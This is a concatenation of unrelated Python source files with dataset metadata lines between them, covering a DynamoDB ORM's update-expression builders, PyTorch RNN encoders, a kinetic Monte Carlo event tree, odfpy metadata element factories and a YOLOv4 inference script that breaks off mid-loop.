size_query(self, *args, **kwargs): return BotoAttr(self._awstin_name).size() class Size(BaseAttribute): _query_type = size_query class DynamoModelMeta(type): def __getattribute__(self, name): attr = super().__getattribute__(name) if isinstance(attr, BaseAttribute): attr._name_on_model = name return attr else: return attr def _dynamodb_attributes(self): result = { getattr(self, attr)._awstin_name: attr for attr in dir(self) if isinstance(getattr(self, attr), BaseAttribute) } return result def _get_kwargs(self): """ Kwargs that should be passed to query, scan, get_item """ return { **self._dynamo_projection(), **self._index_kwargs(), } def _dynamo_projection(self): """ Attributes to request when retrieving data from DynamoDB Returns ------- dict kwargs to be passed to DynamoDB get attribute calls to employ a projection expression and placeholders """ placeholders = { "#" + str(uuid.uuid4())[:8]: value for value in self._dynamodb_attributes().keys() } expression = ", ".join(placeholders.keys()) return dict( ProjectionExpression=expression, ExpressionAttributeNames=placeholders, ) def _index_kwargs(self): if hasattr(self, "_index_name_"): return dict( IndexName=self._index_name_, ) else: return {} class DynamoModel(metaclass=DynamoModelMeta): """ Class defining an ORM model for a DynamoDB table. Subclasses must have a ``_table_name_`` attribute. Attributes making up the data model should be Attr or Key instances. Subclasses representing indexes should also have an ``_index_name_`` attribute """ def __init__(self, **kwargs): """ Parameters ---------- **kwargs : dict of (str, Any) Initialization of Attr and Key attributes. 
""" model_attrs = type(self)._dynamodb_attributes().values() for name in model_attrs: setattr(self, name, NOT_SET) for name, value in kwargs.items(): if name not in model_attrs: msg = f"{type(self)!r} has no attribute {name!r}" raise AttributeError(msg) setattr(self, name, value) @classmethod def deserialize(cls, data): """ Deserialize JSON into a DynamoModel subclass. Internally converts Decimal to float in the deserialization. Parameters ---------- data : dict of (str, Any) Serialized model Returns ------- DynamoModel The deserialized data model """ model_attrs = cls._dynamodb_attributes() result = cls() for attr in model_attrs.values(): setattr(result, attr, NOT_SET) for db_attr, value in data.items(): if db_attr in model_attrs.keys(): if type(value) in [list, set, tuple]: value = type(value)(from_decimal(v) for v in value) elif type(value) is dict: value = {from_decimal(k): from_decimal(v) for k, v in value.items()} else: value = from_decimal(value) setattr(result, model_attrs[db_attr], value) return result def serialize(self): """ Serialize a DynamoModel subclass to JSON that can be inserted into DynamoDB. Internally converts float to Decimal. Returns ------- dict of (str, Any) The serialized JSON entry """ model_attrs = type(self)._dynamodb_attributes() result = {} for dynamo_name, model_name in model_attrs.items(): value = getattr(self, model_name) if value is not NOT_SET: if type(value) in [list, set, tuple]: value = type(value)(to_decimal(v) for v in value) elif type(value) is dict: value = {to_decimal(k): to_decimal(v) for k, v in value.items()} else: value = to_decimal(value) result[dynamo_name] = value return result # ---- Update Operators class UpdateOperator(ABC): """ A representation of an UpdateItem expression """ def __and__(self, other): """ Combine two update expressions """ return CombineOperator(self, other) @abstractmethod def update_dict(self): pass @staticmethod def update_expression(update_dict): expressions = [] for operation in "SET", "ADD", "DELETE", "REMOVE": if update_dict.get(operation): expressions.append(operation + " " + ", ".join(update_dict[operation])) return " ".join(expressions) def serialize(self): """ Produce kwargs to be passed to DynamoDB Table.update_item. 
        Keys and values are:
            "UpdateExpression": string representing the update expression
            "ExpressionAttributeNames": Placeholder map for attribute names
            "ExpressionAttributeValues": Placeholder map for attribute values

        Returns
        -------
        dict
            Kwargs for update_item
        """
        update_dict = self.update_dict()

        result = {
            "UpdateExpression": self.update_expression(update_dict),
        }
        if update_dict["ExpressionAttributeNames"]:
            result["ExpressionAttributeNames"] = update_dict["ExpressionAttributeNames"]
        if update_dict["ExpressionAttributeValues"]:
            result["ExpressionAttributeValues"] = update_dict[
                "ExpressionAttributeValues"
            ]

        return result


class CombineOperator(UpdateOperator):
    """
    Combine two update expressions
    """

    def __init__(self, left, right):
        self.left = left
        self.right = right

    def update_dict(self):
        result = defaultdict(list)
        ser_left = self.left.update_dict()
        ser_right = self.right.update_dict()

        items = list(ser_left.items()) + list(ser_right.items())
        for key, values in items:
            if key in ["SET", "ADD", "DELETE", "REMOVE"]:
                result[key].extend(values)

        result["ExpressionAttributeNames"] = dict(
            **ser_left["ExpressionAttributeNames"],
            **ser_right["ExpressionAttributeNames"],
        )
        result["ExpressionAttributeValues"] = dict(
            **ser_left["ExpressionAttributeValues"],
            **ser_right["ExpressionAttributeValues"],
        )

        return result


class SetOperator(UpdateOperator):
    """
    Support for SET
    """

    def __init__(self, attr, operand):
        self.attr = attr
        self.operand = operand

    def update_dict(self):
        serialized_attr = itemize_attr(self.attr)
        serialized_operand = self.operand.serialize()

        attribute_names = dict(
            **serialized_operand["ExpressionAttributeNames"],
            **serialized_attr["ExpressionAttributeNames"],
        )

        return {
            "SET": [
                f"{serialized_attr['UpdateExpression']} = "
                + serialized_operand["UpdateExpression"]
            ],
            "ExpressionAttributeNames": attribute_names,
            "ExpressionAttributeValues": serialized_operand[
                "ExpressionAttributeValues"
            ],
        }


class AddOperator(UpdateOperator):
    def __init__(self, attr, operand):
        self.attr = attr
        self.operand = operand

    def update_dict(self):
        serialized_attr = itemize_attr(self.attr)
        serialized_operand = self.operand.serialize()

        attribute_names = dict(
            **serialized_operand["ExpressionAttributeNames"],
            **serialized_attr["ExpressionAttributeNames"],
        )

        return {
            "ADD": [
                f"{serialized_attr['UpdateExpression']} "
                + serialized_operand["UpdateExpression"]
            ],
            "ExpressionAttributeNames": attribute_names,
            "ExpressionAttributeValues": serialized_operand[
                "ExpressionAttributeValues"
            ],
        }


class RemoveOperator(UpdateOperator):
    def __init__(self, attr):
        self.attr = attr

    def update_dict(self):
        serialized_attr = itemize_attr(self.attr)

        return {
            "REMOVE": [serialized_attr["UpdateExpression"]],
            "ExpressionAttributeNames": serialized_attr["ExpressionAttributeNames"],
            "ExpressionAttributeValues": {},
        }


class DeleteOperator(UpdateOperator):
    def __init__(self, attr, operand):
        self.attr = attr
        self.operand = operand

    def update_dict(self):
        serialized_attr = itemize_attr(self.attr)
        serialized_operand = self.operand.serialize()

        attribute_names = dict(
            **serialized_operand["ExpressionAttributeNames"],
            **serialized_attr["ExpressionAttributeNames"],
        )

        return {
            "DELETE": [
                f"{serialized_attr['UpdateExpression']} "
                + serialized_operand["UpdateExpression"]
            ],
            "ExpressionAttributeNames": attribute_names,
            "ExpressionAttributeValues": serialized_operand[
                "ExpressionAttributeValues"
            ],
        }


# ---- Update Operands


def serialize_operand(value):
    name = str(uuid.uuid4())[:8]

    if isinstance(value, UpdateOperand):
        return value.serialize()
    elif isinstance(value, BaseAttribute):
        return itemize_attr(value)
    elif type(value) in [list, set, tuple]:
        name = ":" + name
        value = type(value)([to_decimal(v) for v in value])
        return {
            "UpdateExpression": name,
            "ExpressionAttributeNames": {},
            "ExpressionAttributeValues": {name: value},
        }
    else:
        name = ":" + name
        return {
            "UpdateExpression": name,
            "ExpressionAttributeNames": {},
            "ExpressionAttributeValues": {name: to_decimal(value)},
        }


def itemize_attr(attr):
    # Separate indexes
    parts = []
    current_section = ""
    for letter in attr._awstin_name:
        if letter == "[":
            parts.append(current_section)
            current_section = "["
        elif letter == "]":
            parts.append(current_section + "]")
            current_section = ""
        else:
            current_section += letter
    if current_section:
        parts.append(current_section)

    serialized = ""
    name_map = {}

    # Separate attributes
    for part in parts:
        if "[" in part and "]" in part:
            serialized += part
        else:
            if part.startswith("."):
                serialized += "."
                part = part[1:]

            sections = part.split(".")
            serialized_sections = []
            for section in sections:
                name = "#" + str(uuid.uuid4())[:8]
                name_map[name] = section
                serialized_sections.append(name)
            serialized += ".".join(serialized_sections)

    result = {
        "UpdateExpression": serialized,
        "ExpressionAttributeNames": name_map,
        "ExpressionAttributeValues": {},
    }

    return result


class UpdateOperand:
    """
    Inner part of an update expression
    """

    def __init__(self, value):
        self.value = value

    def serialize(self):
        return serialize_operand(self.value)


class CombineOperand(UpdateOperand):
    """
    Add or subtract two expressions
    """

    def __init__(self, left, right, symbol):
        self.left = left
        self.right = right
        self.symbol = symbol

    def serialize(self):
        ser_left = serialize_operand(self.left)
        ser_right = serialize_operand(self.right)

        expression = (
            f"{ser_left['UpdateExpression']} "
            f"{self.symbol} "
            f"{ser_right['UpdateExpression']}"
        )

        return {
            "UpdateExpression": expression,
            "ExpressionAttributeNames": dict(
                **ser_left["ExpressionAttributeNames"],
                **ser_right["ExpressionAttributeNames"],
            ),
            "ExpressionAttributeValues": dict(
                **ser_left["ExpressionAttributeValues"],
                **ser_right["ExpressionAttributeValues"],
            ),
        }


class IfNotExistsOperand(UpdateOperand):
    """
    Set a value if the given attribute does not exist
    """

    def __init__(self, attr, value):
        self.attr = attr
        self.value = value

    def serialize(self):
        ser_attr = serialize_operand(self.attr)
        ser_value = serialize_operand(self.value)

        expression = (
            f"if_not_exists({ser_attr['UpdateExpression']}, "
            f"{ser_value['UpdateExpression']})"
        )

        return {
            "UpdateExpression": expression,
            "ExpressionAttributeNames": dict(
                **ser_attr["ExpressionAttributeNames"],
                **ser_value["ExpressionAttributeNames"],
            ),
            "ExpressionAttributeValues": dict(
                **ser_attr["ExpressionAttributeValues"],
                **ser_value["ExpressionAttributeValues"],
            ),
        }


class ListAppendOperand(UpdateOperand):
    """
    Combine two lists
    """

    def __init__(self, left, right):
        self.left = left
        self.right = right

    def serialize(self):
        ser_left = serialize_operand(self.left)
        ser_right = serialize_operand(self.right)

        expression = (
            f"list_append({ser_left['UpdateExpression']}, "
            f"{ser_right['UpdateExpression']})"
        )

        return {
            "UpdateExpression": expression,
            "ExpressionAttributeNames": dict(
                **ser_left["ExpressionAttributeNames"],
                **ser_right["ExpressionAttributeNames"],
            ),
            "ExpressionAttributeValues": dict(
                **ser_left["ExpressionAttributeValues"],
                **ser_right["ExpressionAttributeValues"],
            ),
        }


def list_append(left, right):
    """
    Set a value to the combination of two lists in an update expression
    """
    return ListAppendOperand(UpdateOperand(left), UpdateOperand(right))
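A minimal usage sketch of the operators above: DummyAttr is a hypothetical stand-in exposing only the _awstin_name attribute that itemize_attr reads, and it assumes BaseAttribute, UpdateOperator, to_decimal, uuid, and defaultdict are defined or imported in the earlier, unshown part of this module.

# Hypothetical stand-in: itemize_attr only touches attr._awstin_name.
class DummyAttr:
    _awstin_name = "score"

op = SetOperator(DummyAttr(), UpdateOperand(5))
parts = op.update_dict()
# parts["SET"] holds one clause of the form "#<name placeholder> = :<value placeholder>",
# with the real attribute name and value routed through the two placeholder maps.
print(parts["SET"], parts["ExpressionAttributeNames"], parts["ExpressionAttributeValues"])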
27.912987
88
0.579258
18,878
0.878332
0
0
1,584
0.073698
0
0
7,566
0.352022
d5b22ea34f0bbc299fab73839184251258eecd69
310
py
Python
Losses/__init__.py
SimonTheVillain/ActiveStereoNet
708bddce844998b366be1a1ec8a72a31ccd26f8c
[ "MIT" ]
17
2019-08-23T04:00:32.000Z
2022-02-06T13:37:02.000Z
Losses/__init__.py
SimonTheVillain/ActiveStereoNet
708bddce844998b366be1a1ec8a72a31ccd26f8c
[ "MIT" ]
null
null
null
Losses/__init__.py
SimonTheVillain/ActiveStereoNet
708bddce844998b366be1a1ec8a72a31ccd26f8c
[ "MIT" ]
7
2019-12-20T07:46:41.000Z
2021-11-01T04:18:19.000Z
from .supervise import *


def get_losses(name, **kwargs):
    name = name.lower()
    if name == 'rhloss':
        loss = RHLoss(**kwargs)
    elif name == 'xtloss':
        loss = XTLoss(**kwargs)
    else:
        raise NotImplementedError('Loss [{:s}] is not supported.'.format(name))
    return loss
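A minimal sketch of the lookup above; the kwargs for RHLoss are placeholders, since its constructor lives in .supervise and is not shown here.

from Losses import get_losses

loss_cfg = {}  # placeholder: fill with whatever kwargs RHLoss actually expects
criterion = get_losses('RHLoss', **loss_cfg)  # names are lower-cased, so 'RHLoss' == 'rhloss'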
22.142857
79
0.580645
0
0
0
0
0
0
0
0
47
0.151613
d5b25fcda4db3927e0504a3caa222468f8e2eb7c
6,766
py
Python
model/src/recurrent.py
qkaren/converse_reading_cmr
d06d981be12930cff8458e2b1b81be4f5df3a329
[ "MIT" ]
87
2019-06-07T18:16:30.000Z
2021-11-27T08:18:45.000Z
model/src/recurrent.py
qkaren/converse_reading_cmr
d06d981be12930cff8458e2b1b81be4f5df3a329
[ "MIT" ]
11
2019-06-19T20:53:27.000Z
2021-05-07T01:05:01.000Z
model/src/recurrent.py
qkaren/converse_reading_cmr
d06d981be12930cff8458e2b1b81be4f5df3a329
[ "MIT" ]
17
2019-06-08T01:50:23.000Z
2022-02-16T07:12:15.000Z
import torch
import torch.nn as nn
from torch.nn.parameter import Parameter
from torch.nn.utils.rnn import pad_packed_sequence as unpack
from torch.nn.utils.rnn import pack_padded_sequence as pack
from .my_optim import weight_norm as WN

# TODO: use system func to bind ~
RNN_MAP = {'lstm': nn.LSTM, 'gru': nn.GRU, 'rnn': nn.RNN}


class OneLayerBRNN(nn.Module):
    def __init__(self, input_size, hidden_size, prefix='stack_rnn', opt={}, dropout=None):
        super(OneLayerBRNN, self).__init__()
        self.opt = opt
        self.prefix = prefix
        self.cell_type = self.opt.get('{}_cell'.format(self.prefix), 'lstm')
        self.emb_dim = self.opt.get('{}_embd_dim'.format(self.prefix), 0)
        self.maxout_on = self.opt.get('{}_maxout_on'.format(self.prefix), False)
        self.weight_norm_on = self.opt.get('{}_weight_norm_on'.format(self.prefix), False)
        self.dropout = dropout
        self.output_size = hidden_size if self.maxout_on else hidden_size * 2
        self.hidden_size = hidden_size
        self.rnn = RNN_MAP[self.cell_type](input_size, hidden_size, num_layers=1, bidirectional=True)

    def forward(self, x, x_mask):
        x = x.transpose(0, 1)
        size = list(x.size())
        rnn_output, h = self.rnn(x)
        if self.maxout_on:
            rnn_output = rnn_output.view(size[0], size[1], self.hidden_size, 2).max(-1)[0]
        # Transpose back
        hiddens = rnn_output.transpose(0, 1)
        return hiddens


class BRNNEncoder(nn.Module):
    def __init__(self, input_size, hidden_size, prefix='rnn', opt={}, dropout=None):
        super(BRNNEncoder, self).__init__()
        self.opt = opt
        self.dropout = dropout
        self.prefix = prefix  # store the prefix; it is read by every opt.get below
        self.cell_type = opt.get('{}_cell'.format(self.prefix), 'gru')
        self.weight_norm_on = opt.get('{}_weight_norm_on'.format(self.prefix), False)
        self.top_layer_only = opt.get('{}_top_layer_only'.format(self.prefix), False)
        self.num_layers = opt.get('{}_num_layers'.format(self.prefix), 1)
        self.rnn = RNN_MAP[self.cell_type](input_size, hidden_size, self.num_layers, bidirectional=True)
        if self.weight_norm_on:
            self.rnn = WN(self.rnn)
        if self.top_layer_only:
            self.output_size = hidden_size * 2
        else:
            self.output_size = self.num_layers * hidden_size * 2

    def forward(self, x, x_mask):
        x = self.dropout(x)
        _, h = self.rnn(x.transpose(0, 1).contiguous())
        if self.cell_type == 'lstm':
            h = h[0]
        shape = h.size()
        # h is (num_layers * 2, batch, hidden_size), so its last dim is shape[2]
        h = h.view(self.num_layers, 2, shape[1], shape[2]).transpose(1, 2).contiguous()
        h = h.view(self.num_layers, shape[1], 2 * shape[2])
        if self.top_layer_only:
            return h[-1]
        else:
            return h.transpose(0, 1).contiguous().view(x.size(0), -1)


#------------------------------
# Contextual embedding
# TODO: remove packing to speed up
# Credit from: https://github.com/salesforce/cove
#------------------------------
class ContextualEmbedV2(nn.Module):
    def __init__(self, model_path, padding_idx=0):
        super(ContextualEmbedV2, self).__init__()
        state_dict = torch.load(model_path)
        self.rnn1 = nn.LSTM(300, 300, num_layers=1, bidirectional=True)
        self.rnn2 = nn.LSTM(600, 300, num_layers=1, bidirectional=True)
        state_dict1 = dict([(name, param.data) if isinstance(param, Parameter) else (name, param)
                            for name, param in state_dict.items() if '0' in name])
        state_dict2 = dict([(name.replace('1', '0'), param.data) if isinstance(param, Parameter)
                            else (name.replace('1', '0'), param)
                            for name, param in state_dict.items() if '1' in name])
        self.rnn1.load_state_dict(state_dict1)
        self.rnn2.load_state_dict(state_dict2)
        for p in self.parameters():
            p.requires_grad = False
        self.output_size = 600

    def setup_eval_embed(self, eval_embed, padding_idx=0):
        pass

    def forward(self, x, x_mask):
        """A pretrained MT-LSTM (McCann et al. 2017).
        """
        lengths = x_mask.data.eq(0).long().sum(1).squeeze()
        lens, indices = torch.sort(lengths, 0, True)
        output1, _ = self.rnn1(pack(x[indices], lens.tolist(), batch_first=True))
        output2, _ = self.rnn2(output1)

        output1 = unpack(output1, batch_first=True)[0]
        output2 = unpack(output2, batch_first=True)[0]
        _, _indices = torch.sort(indices, 0)
        output1 = output1[_indices]
        output2 = output2[_indices]

        return output1, output2


class ContextualEmbed(nn.Module):
    def __init__(self, path, vocab_size, emb_dim=300, embedding=None, padding_idx=0):
        super(ContextualEmbed, self).__init__()

        self.embedding = nn.Embedding(vocab_size, emb_dim, padding_idx=padding_idx)
        if embedding is not None:
            self.embedding.weight.data = embedding

        state_dict = torch.load(path)
        self.rnn1 = nn.LSTM(300, 300, num_layers=1, bidirectional=True)
        self.rnn2 = nn.LSTM(600, 300, num_layers=1, bidirectional=True)
        state_dict1 = dict([(name, param.data) if isinstance(param, Parameter) else (name, param)
                            for name, param in state_dict.items() if '0' in name])
        state_dict2 = dict([(name.replace('1', '0'), param.data) if isinstance(param, Parameter)
                            else (name.replace('1', '0'), param)
                            for name, param in state_dict.items() if '1' in name])
        self.rnn1.load_state_dict(state_dict1)
        self.rnn2.load_state_dict(state_dict2)
        for p in self.parameters():
            p.requires_grad = False
        self.output_size = 600

    def setup_eval_embed(self, eval_embed, padding_idx=0):
        self.eval_embed = nn.Embedding(eval_embed.size(0), eval_embed.size(1), padding_idx=padding_idx)
        self.eval_embed.weight.data = eval_embed
        for p in self.eval_embed.parameters():
            p.requires_grad = False

    def forward(self, x_idx, x_mask):
        emb = self.embedding if self.training else self.eval_embed
        x_hiddens = emb(x_idx)
        lengths = x_mask.data.eq(0).long().sum(1)
        lens, indices = torch.sort(lengths, 0, True)
        output1, _ = self.rnn1(pack(x_hiddens[indices], lens.tolist(), batch_first=True))
        output2, _ = self.rnn2(output1)
        output1 = unpack(output1, batch_first=True)[0]
        output2 = unpack(output2, batch_first=True)[0]
        _, _indices = torch.sort(indices, 0)
        output1 = output1[_indices]
        output2 = output2[_indices]
        return output1, output2
45.716216
134
0.619125
6,228
0.920485
0
0
0
0
0
0
484
0.071534
d5b27d5f6e6878759cb3ab473c4702b3507a5b67
2,810
py
Python
kmcsim/sim/events_old.py
vlcekl/kmcpy
b55a23f64d4b6d2871671f4a16346cc897c4a2a5
[ "MIT" ]
null
null
null
kmcsim/sim/events_old.py
vlcekl/kmcpy
b55a23f64d4b6d2871671f4a16346cc897c4a2a5
[ "MIT" ]
null
null
null
kmcsim/sim/events_old.py
vlcekl/kmcpy
b55a23f64d4b6d2871671f4a16346cc897c4a2a5
[ "MIT" ]
null
null
null
#!//anaconda/envs/py36/bin/python
#
#  File name: kmc_pld.py
#  Date:      2018/08/03 09:07
#  Author:    Lukas Vlcek
#
#  Description:
#

import numpy as np
from collections import Counter

class EventTree:
    """
    Class maintaining a binary tree for random event type lookup
    and arrays for choosing specific event.
    """

    def __init__(self, rates, events):
        self.rates = rates
        self.events = events
        self.__setup()

    def __build_tree(self, e_ratio):
        self.event_tree = []

        # create event ratio array level 0 - bottom
        if len(e_ratio) % 2 == 1:
            e_ratio.extend([0.0])

        # create the bottom level (rates*numbers)
        self.event_tree.append(np.array(e_ratio))

        # create partial sums (iteratively) up to the 2nd highest level
        while len(e_ratio) > 2:
            e_ratio = [e_ratio[i]+e_ratio[i+1] for i in range(0, len(e_ratio), 2)]
            if len(e_ratio) % 2 == 1:
                e_ratio.extend([0.0])

            self.event_tree.append(np.array(e_ratio))

        # create top level = sum of all rates
        self.event_tree.append(np.array(sum(e_ratio)))

    def __setup(self):

        # Get dictionary of event type counts
        e_counts = Counter([e['type'] for e in self.events])
        print(e_counts)

        # create a list of events based on event types
        self.event_counts = [[] for _ in range(len(self.rates))]
        for e in self.events:
            self.event_counts[e['type']].append(e)

        e_ratio = [e_counts.get(t, 0)*r for t, r in enumerate(self.rates)]
        print('e_ratio', e_ratio)

        self.__build_tree(e_ratio)

    def update_events(self, old_events, new_events):
        """
        Update tree: remove old events and add new events
        """
        pass

    def find_event(self):
        """Find and return an event"""

        # generate a random number in [0, total rate); the total rate is
        # stored at the top of the tree
        q = self.event_tree[-1]*np.random.random()

        # cycle through levels (top->down)
        # start with top-level child (k-2) end with level above bottom (1)
        j = 0
        for k in range(len(self.event_tree)-2, 0, -1):
            # left child value
            left = self.event_tree[k][j]

            if q < left:
                j = 2*j
            else:
                q -= left
                j = 2*j + 1

        # bottom level - the bottom index is the event type id itself
        if q < self.event_tree[0][j]:
            event_type = j
        else:
            event_type = j + 1

        # select a random event index of a given type
        event_number = np.random.randint(len(self.event_counts[event_type]))

        # get the event object
        event = self.event_counts[event_type][event_number]

        return event
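find_event above is a standard logarithmic lookup over a partial-sum binary tree. A self-contained sketch of the same walk, independent of the class and its event bookkeeping:

import numpy as np

def sample_index(weights, rng=np.random):
    """Pick an index with probability proportional to its weight, using the
    same top-down partial-sum walk as EventTree.find_event."""
    levels = [np.array(weights, dtype=float)]
    while len(levels[-1]) > 1:
        prev = levels[-1]
        if len(prev) % 2 == 1:
            prev = np.append(prev, 0.0)  # pad odd levels, as __build_tree does
        levels.append(prev[0::2] + prev[1::2])
    q = rng.random() * levels[-1][0]     # uniform in [0, total weight)
    j = 0
    for level in reversed(levels[:-1]):  # walk from the root toward the leaves
        j *= 2
        if q >= level[j]:                # skip the left child's mass, go right
            q -= level[j]
            j += 1
    return j

counts = np.bincount([sample_index([1.0, 2.0, 3.0]) for _ in range(6000)])
print(counts)  # roughly proportional to 1:2:3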
26.509434
82
0.56548
2,614
0.930249
0
0
0
0
0
0
916
0.325979
d5b2899060598acf5361fb2c9db968e61435c9da
2,181
py
Python
env/lib/python3.6/site-packages/odf/meta.py
anthowen/duplify
846d01c1b21230937fdf0281b0cf8c0b08a8c24e
[ "MIT" ]
5,079
2015-01-01T03:39:46.000Z
2022-03-31T07:38:22.000Z
env/lib/python3.6/site-packages/odf/meta.py
anthowen/duplify
846d01c1b21230937fdf0281b0cf8c0b08a8c24e
[ "MIT" ]
1,623
2015-01-01T08:06:24.000Z
2022-03-30T19:48:52.000Z
env/lib/python3.6/site-packages/odf/meta.py
anthowen/duplify
846d01c1b21230937fdf0281b0cf8c0b08a8c24e
[ "MIT" ]
2,033
2015-01-04T07:18:02.000Z
2022-03-28T19:55:47.000Z
# -*- coding: utf-8 -*-
# Copyright (C) 2006-2007 Søren Roug, European Environment Agency
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Contributor(s):
#

from odf.namespaces import METANS
from odf.element import Element

# Autogenerated
def AutoReload(**args):
    return Element(qname = (METANS,'auto-reload'), **args)

def CreationDate(**args):
    return Element(qname = (METANS,'creation-date'), **args)

def DateString(**args):
    return Element(qname = (METANS,'date-string'), **args)

def DocumentStatistic(**args):
    return Element(qname = (METANS,'document-statistic'), **args)

def EditingCycles(**args):
    return Element(qname = (METANS,'editing-cycles'), **args)

def EditingDuration(**args):
    return Element(qname = (METANS,'editing-duration'), **args)

def Generator(**args):
    return Element(qname = (METANS,'generator'), **args)

def HyperlinkBehaviour(**args):
    return Element(qname = (METANS,'hyperlink-behaviour'), **args)

def InitialCreator(**args):
    return Element(qname = (METANS,'initial-creator'), **args)

def Keyword(**args):
    return Element(qname = (METANS,'keyword'), **args)

def PrintDate(**args):
    return Element(qname = (METANS,'print-date'), **args)

def PrintedBy(**args):
    return Element(qname = (METANS,'printed-by'), **args)

def Template(**args):
    args.setdefault('type', 'simple')
    return Element(qname = (METANS,'template'), **args)

def UserDefined(**args):
    return Element(qname = (METANS,'user-defined'), **args)
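A hedged sketch of how these factories are typically used alongside the rest of odfpy; the OpenDocumentText and doc.meta API is assumed from the standard odfpy package.

from odf.opendocument import OpenDocumentText
from odf.meta import Generator, InitialCreator, Keyword

doc = OpenDocumentText()
# Element accepts a ``text`` keyword for the element's text content.
doc.meta.addElement(Generator(text="example-tool/1.0"))
doc.meta.addElement(InitialCreator(text="Jane Doe"))
doc.meta.addElement(Keyword(text="sample"))
doc.save("example.odt")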
32.073529
80
0.707474
0
0
0
0
0
0
0
0
1,054
0.483043
d5b2a5e3c1f4caec8e1b4e760aef349c24f989cf
7,293
py
Python
scripts/my_inference.py
Mr-TalhaIlyas/Scaled-YOLOv4
2b0326a6bc1eba386eb1a78b56727dcf29c77bac
[ "MIT" ]
null
null
null
scripts/my_inference.py
Mr-TalhaIlyas/Scaled-YOLOv4
2b0326a6bc1eba386eb1a78b56727dcf29c77bac
[ "MIT" ]
null
null
null
scripts/my_inference.py
Mr-TalhaIlyas/Scaled-YOLOv4
2b0326a6bc1eba386eb1a78b56727dcf29c77bac
[ "MIT" ]
null
null
null
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '2'
import torch
torch.rand(10)
import torch.nn as nn
import torch.nn.functional as F
import glob
from tqdm import tqdm, trange

print(torch.cuda.is_available())
print(torch.cuda.get_device_name())
print(torch.cuda.current_device())
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print('Using device:', device)
print()
# Additional Info when using cuda
if device.type == 'cuda':
    print(torch.cuda.get_device_name(0))
    print('Memory Usage:')
    print('Allocated:', round(torch.cuda.memory_allocated(0)/1024**3,1), 'GB')
    print('Cached:   ', round(torch.cuda.memory_reserved(0)/1024**3,1), 'GB')

import torch.backends.cudnn as cudnn
import numpy as np
import os, cv2
from tqdm import tqdm, trange
import seaborn as sns

from models.experimental import attempt_load
from utils.datasets import LoadStreams, LoadImages
from utils.general import (
    check_img_size, non_max_suppression, apply_classifier, scale_coords,
    xyxy2xywh, plot_one_box, strip_optimizer)
from utils.torch_utils import select_device, load_classifier, time_synchronized
from my_utils import xyxy_2_xyxyo, draw_boxes

# Initialize
device = select_device('')
half = device.type != 'cpu'  # half precision only supported on CUDA

def prepare_input(img1, img_size=416, half=True):
    img2 = cv2.resize(img1, (img_size, img_size))  # W x H
    img2 = img2.transpose(2, 0, 1)
    img2 = img2[np.newaxis, ...]
    img2 = torch.from_numpy(img2).to(device)  # torch image is ch x H x W
    img2 = img2.half() if half else img2.float()  # cast to the model's precision (FP16 on CUDA)
    img2 /= 255.0
    return img2
#%%
# Directories
out = '/home/user01/data_ssd/Talha/yolo/op/'
weights = '/home/user01/data_ssd/Talha/yolo/ScaledYOLOv4/runs/exp2_yolov4-csp-results/weights/best_yolov4-csp-results.pt'
source = '/home/user01/data_ssd/Talha/yolo/paprika_y5/valid/images/'
imgsz = 416
conf_thres = 0.4
iou_thres = 0.5
classes = [0, 1, 2, 3, 4, 5]
class_names = ["blossom_end_rot", "graymold", "powdery_mildew", "spider_mite",
               "spotting_disease", "snails_and_slugs"]

# deleting files in op_dir
filelist = [f for f in os.listdir(out)]  # if f.endswith(".png")
for f in tqdm(filelist, desc='Deleting old files from directory'):
    os.remove(os.path.join(out, f))

# Load model
model = attempt_load(weights, map_location=device)  # load FP32 model
imgsz = check_img_size(imgsz, s=model.stride.max())  # check img_size
if half:
    model.half()  # to FP16

img_paths = glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.png') + \
            glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.jpg')

# Run inference
if device.type != 'cpu':
    model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters())))  # run once
#%%
for i in trange(len(img_paths)):
    path = img_paths[i]
    img1 = cv2.imread(path)
    img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2RGB)
    img_h, img_w, _ = img1.shape
    img2 = prepare_input(img1, 416, half)
    # get file name
    name = os.path.basename(path)[:-4]
    # Inference
    t1 = time_synchronized()
    pred = model(img2, augment=False)[0]
    # Apply NMS
    pred = non_max_suppression(pred, conf_thres, iou_thres, classes=classes, agnostic=True)
    if pred[0] is not None:
        boxes = pred[0].cpu().detach().numpy()  # <xmin><ymin><xmax><ymax><confd><class_id>
    else:
        boxes = np.array([10.0, 20.0, 30.0, 50.0, 0.75, 0]).reshape(1, 6)  # dummy values
    coords_minmax = np.zeros((boxes.shape[0], 4))  # dropping 5th value
    confd = np.zeros((boxes.shape[0], 1))
    class_ids = np.zeros((boxes.shape[0], 1))
    # assign
    coords_minmax = boxes[:, 0:4]  # coords
    confd = boxes[:, 4]  # confidence
    class_ids = boxes[:, 5]  # class id

    coords_xyminmax = []
    det_classes = []
    for i in range(boxes.shape[0]):
        coords_xyminmax.append(xyxy_2_xyxyo(img_w, img_h, coords_minmax[i]))
        det_classes.append(class_names[int(class_ids[i])])

    all_bounding_boxnind = []
    for i in range(boxes.shape[0]):
        bounding_box = [0.0] * 6
        bounding_box[0] = det_classes[i]
        bounding_box[1] = confd[i]
        bounding_box[2] = coords_xyminmax[i][0]
        bounding_box[3] = coords_xyminmax[i][1]
        bounding_box[4] = coords_xyminmax[i][2]
        bounding_box[5] = coords_xyminmax[i][3]
        bounding_box = str(bounding_box)[1:-1]  # remove square brackets
        bounding_box = bounding_box.replace("'", '')  # remove inverted commas around class name
        bounding_box = "".join(bounding_box.split())  # remove spaces in between **here dont give space inbetween the inverted commas "".
        all_bounding_boxnind.append(bounding_box)

    all_bounding_boxnind = ' '.join(map(str, all_bounding_boxnind))  # convert list to string
    all_bounding_boxnind = list(all_bounding_boxnind.split(' '))  # convert string to list
    # replacing commas with spaces
    for i in range(len(all_bounding_boxnind)):
